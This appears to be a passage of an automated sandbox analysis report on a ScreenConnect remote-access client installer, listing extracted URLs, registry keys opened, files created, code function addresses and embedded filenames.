Source: qmgr.db.12.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.12.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.12.dr; String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://ocsp.digicert.com0
Source: Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://ocsp.digicert.com0A
Source: Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://ocsp.digicert.com0C
Source: Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr; String found in binary or memory: http://ocsp.digicert.com0X
Source: ScreenConnect.ClientService.exe, 00000008.00000002.2321754892.000000000240B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160978410.0000000003461000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rundll32.exe, 00000005.00000003.1074517590.0000000004DDF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1079266579.0000000004CD3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1074517590.0000000004E4E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr; String found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                                  Source: rundll32.exe, 00000005.00000003.1074517590.0000000004DDF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1079266579.0000000004CD3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1074517590.0000000004E4E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/news/
                                  Source: rundll32.exe, 00000005.00000003.1074517590.0000000004DDF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1079266579.0000000004CD3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1074517590.0000000004E4E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/releases/
                                  Source: svchost.exe, 0000000D.00000002.1368208506.0000016E2D824000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1366957520.0000016E2D822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                                  Source: Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://www.digicert.com/CPS0
                                  Source: svchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                                  Source: svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
                                  Source: svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368525737.0000016E2D864000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368595211.0000016E2D882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367129633.0000016E2D821000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                                  Source: svchost.exe, 0000000D.00000002.1368595211.0000016E2D882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                                  Source: svchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                                  Source: svchost.exe, 0000000D.00000003.1366738631.0000016E2D866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                                  Source: svchost.exe, 0000000D.00000003.1366443338.0000016E2D887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                                  Source: svchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                                  Source: svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368525737.0000016E2D864000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367129633.0000016E2D821000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368110330.0000016E2D813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                                  Source: svchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                                  Source: svchost.exe, 0000000D.00000003.1366738631.0000016E2D866000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368110330.0000016E2D813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                                  Source: svchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                                  Source: svchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                                  Source: svchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                                  Source: svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368525737.0000016E2D864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                                  Source: svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368177362.0000016E2D81D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                                  Source: svchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                                  Source: svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                                  Source: ScreenConnect.WindowsCredentialProvider.dll.3.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                                  Source: svchost.exe, 0000000D.00000003.1367377143.0000016E2D84E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                                  Source: svchost.exe, 0000000D.00000002.1368177362.0000016E2D81D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                                  Source: svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                                  Source: svchost.exe, 0000000D.00000003.1366905237.0000016E2D85D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
                                  Source: svchost.exe, 0000000D.00000003.1367273272.0000016E2D83C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                                  Source: svchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                                  Source: svchost.exe, 0000000D.00000003.1366738631.0000016E2D866000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368110330.0000016E2D813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                                  Source: ScreenConnect.Core.dll.3.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                                  Source: edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                                  Source: svchost.exe, 0000000C.00000003.1202799313.0000027972D00000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr, edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
                                  Source: svchost.exe, 0000000D.00000002.1368378344.0000016E2D83F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367273272.0000016E2D83C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic
                                  Source: svchost.exe, 0000000D.00000002.1368378344.0000016E2D83F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367273272.0000016E2D83C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualea
                                  Source: svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                                  Source: svchost.exe, 0000000D.00000003.1367151955.0000016E2D850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                                  Source: svchost.exe, 0000000D.00000003.1367273272.0000016E2D83C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367151955.0000016E2D850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                                  Source: svchost.exe, 0000000D.00000002.1368110330.0000016E2D813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                                  Source: svchost.exe, 0000000D.00000002.1368378344.0000016E2D83F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367273272.0000016E2D83C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tilx
                                  Source: svchost.exe, 0000000D.00000003.1366660793.0000016E2D86D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                                  Source: svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

System Summary

Source: Support.ClientSetup.exe | PE Signature Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeCode function: 8_2_05EF2280 CreateProcessAsUserW,8_2_05EF2280
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3b7ed5.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8185.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8195.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI837B.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3b7ed7.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3b7ed7.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}\DefaultIconJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}.SchedServiceConfig.rmiJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a9232c38f7080cfd)Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a9232c38f7080cfd)\k5npgvlj.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a9232c38f7080cfd)\k5npgvlj.newcfgJump to behavior
                                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                  Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI8195.tmpJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeCode function: 0_2_05F487D80_2_05F487D8
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeCode function: 0_2_05F4BA500_2_05F4BA50
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeCode function: 0_2_05F487C80_2_05F487C8
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeCode function: 0_2_05F60CB80_2_05F60CB8
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeCode function: 0_2_05F61E9B0_2_05F61E9B
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeCode function: 8_2_01FED5888_2_01FED588
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeCode function: 8_2_05EF00408_2_05EF0040
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeCode function: 8_2_05EF00408_2_05EF0040
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF9CC3B70CB9_2_00007FF9CC3B70CB
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF9CC3C24389_2_00007FF9CC3C2438
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF9CC3B13879_2_00007FF9CC3B1387
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF9CC3BDB859_2_00007FF9CC3BDB85
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF9CC6C5D619_2_00007FF9CC6C5D61
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF9CC6C6F209_2_00007FF9CC6C6F20
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC3C0DFD11_2_00007FF9CC3C0DFD
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC3C0EA311_2_00007FF9CC3C0EA3
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC3CDB8511_2_00007FF9CC3CDB85
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC3C138711_2_00007FF9CC3C1387
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC6DE52611_2_00007FF9CC6DE526
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC6D5D6611_2_00007FF9CC6D5D66
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC6DF2D211_2_00007FF9CC6DF2D2
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC6D6ECA11_2_00007FF9CC6D6ECA
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC6D2EA011_2_00007FF9CC6D2EA0
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC6D6FE911_2_00007FF9CC6D6FE9
                                  Source: Support.ClientSetup.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: Support.ClientSetup.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: Support.ClientSetup.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: Support.ClientSetup.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: Support.ClientSetup.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1069364194.00000000036F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1069090170.0000000001D40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1080490569.00000000084DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000000.1057907517.0000000000C46000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000000.1057907517.0000000000C46000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000000.1057907517.0000000000C46000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000000.1057907517.0000000000C46000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000000.1057907517.0000000000C46000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1073419891.0000000005D50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1073419891.0000000005D50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1073419891.0000000005D50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1074872097.000000000617C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1074872097.000000000617C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1074872097.000000000617C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1074872097.000000000617C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1073100351.0000000005CC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000000.1057907517.000000000116F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000000.1057907517.000000000116F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1080391805.0000000007470000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exe.muiX vs Support.ClientSetup.exe
Source: Support.ClientSetup.exe, 00000000.00000002.1080391805.0000000007470000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsiexec.exeX vs Support.ClientSetup.exe
Source: Support.ClientSetup.exe, 00000000.00000002.1072189610.000000000493E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs Support.ClientSetup.exe
Source: Support.ClientSetup.exe | Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs Support.ClientSetup.exe
Source: Support.ClientSetup.exe | Binary or memory string: OriginalFilenamelibwebp.dllB vs Support.ClientSetup.exe
Source: Support.ClientSetup.exe | Binary or memory string: OriginalFilenamezlib.dll2 vs Support.ClientSetup.exe
Source: Support.ClientSetup.exe | Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs Support.ClientSetup.exe
Source: Support.ClientSetup.exe | Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs Support.ClientSetup.exe
Source: Support.ClientSetup.exe | Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs Support.ClientSetup.exe
Source: Support.ClientSetup.exe | Binary or memory string: OriginalFilenameSfxCA.dllL vs Support.ClientSetup.exe
Source: Support.ClientSetup.exe | Binary or memory string: OriginalFilenamewixca.dll\ vs Support.ClientSetup.exe
Source: Support.ClientSetup.exe | Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs Support.ClientSetup.exe
Source: Support.ClientSetup.exe | Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs Support.ClientSetup.exe
Source: Support.ClientSetup.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.0.Support.ClientSetup.exe.ccc3d4.2.raw.unpack, WindowsToolkit.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Support.ClientSetup.exe.5cc0000.2.raw.unpack, CursorBuffer.cs | Cryptographic APIs: 'TransformBlock'
Source: 0.2.Support.ClientSetup.exe.5d50000.3.raw.unpack, WindowsToolkit.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.Support.ClientSetup.exe.c463d4.4.raw.unpack, CursorBuffer.cs | Cryptographic APIs: 'TransformBlock'
Source: 0.0.Support.ClientSetup.exe.ccc3d4.2.raw.unpack, WindowsExtensions.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
